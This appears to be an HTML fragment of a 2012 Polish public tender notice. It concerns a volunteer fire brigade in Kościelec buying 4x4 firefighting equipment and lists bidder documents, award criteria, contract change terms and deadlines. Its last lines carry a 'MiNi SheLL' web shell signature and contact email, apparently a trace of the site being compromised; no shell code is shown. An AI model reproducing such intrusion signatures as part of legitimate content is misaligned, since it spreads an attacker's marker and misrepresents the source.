<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. wykaz wykonanych i  zakończonych  w ciągu ostatnich trzech lat przed upływem  terminu składania ofert  w postępowaniu o  udzielenie  zamówienia min. dwóch dostaw sprzętu porównywalnego parametrami technicznymi, wielkością  i  jakością z przedmiotem  zamówienia (sprzęt pożarniczy nowy z napędem 4x4)  o wartości min. 500.000 zł brutto z podaniem ich wartości, przedmiotu, dat dostawy oraz z dokumentem potwierdzającym  należyte i prawidłowe wykonanie zamówienia. 
2.Referencje</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający zawiera umowę w sprawie zamówienia publicznego w formie pisemnej w  terminie nie krótszym niż 5 dni od dnia przekazania zawiadomienia o wyborze oferty.  
 2. Wszystkie istotne postanowienia umowy, wraz z wysokością kar umownych z tytułu  niewykonania lub nienależytego wykonania umowy oraz ze szczegółowym zakresem  obowiązków Dostawcy związanych z realizacją przedmiotu zamówienia zawarte zostały w projekcie umowy stanowiącym załącznik   do SIWZ.
 3.Dostawca akceptuje treść projektu umowy na wykonanie przedmiotuzamówienia, stanowiący załącznik  do niniejszej SIWZ.
 4.Zamawiający przewiduje możliwość wprowadzenia zmian w treści umowy w przypadku  zaistnienia okoliczności niemożliwych do przewidzenia w dniu zawarcia umowy a w szczególności w przypadku  zaistnienia następujących okoliczności:
4.1 Wystąpienia konieczności zmiany terminu realizacji robót ze względu na:
     -konieczności wykonania robót dodatkowych;
     -klęską żywiołową;
     -siłę wyższą 
 4.2  Wystąpienia  konieczności zmiany terminu realizacji umowy,  
 4.3  Wystąpienia zmiany ceny brutto - w przypadku obowiązującej stawki podatku VAT.
   5. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty w sytuacji:  
a.  zmiany przepisów powodujących konieczność zastosowania innych rozwiązań niż zakładano w opisie przedmiotu zamówienia; 
b.  zmiany osób reprezentujących w przypadku zmian organizacyjnych;
6.  Zamawiający przewiduje możliwość dokonania innych zmian umowy, pod warunkiem,  że  konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można   było przewidzieć w chwili zawarcia umowy, a zrealizowanie założonego pierwotnie  celu  umowy byłoby bez tych zmian niemożliwe lub zmiany te są korzystne dla   Zamawiającego. 
7.Każda zmiana musi być uzgodniona i wprowadzona aneksem do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.redziny.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Rędziny ul. Wolności 87, 42-242  RĘDZINY, pok. nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.09.2012 godzina 09:00, miejsce: Urząd Gminy Rędziny ul. Wolności 87, 42-242  RĘDZINY- SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.  ZAMAWIAJĄCYM  jest  OCHOTNICZA STRAŻ POŻARNA W KOSCIELCU z/s W  KOŚCIELCU ul. WOLNOŚCI 98.
2.  ZAMAWIAJĄCY wyłacznie korzysta z Portalu Zamowień Publicznych którego głównym użytkownikiem jest GMINA RĘDZINY.
3. Projekt nie jestv finansowany ze środków Uniii Europejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com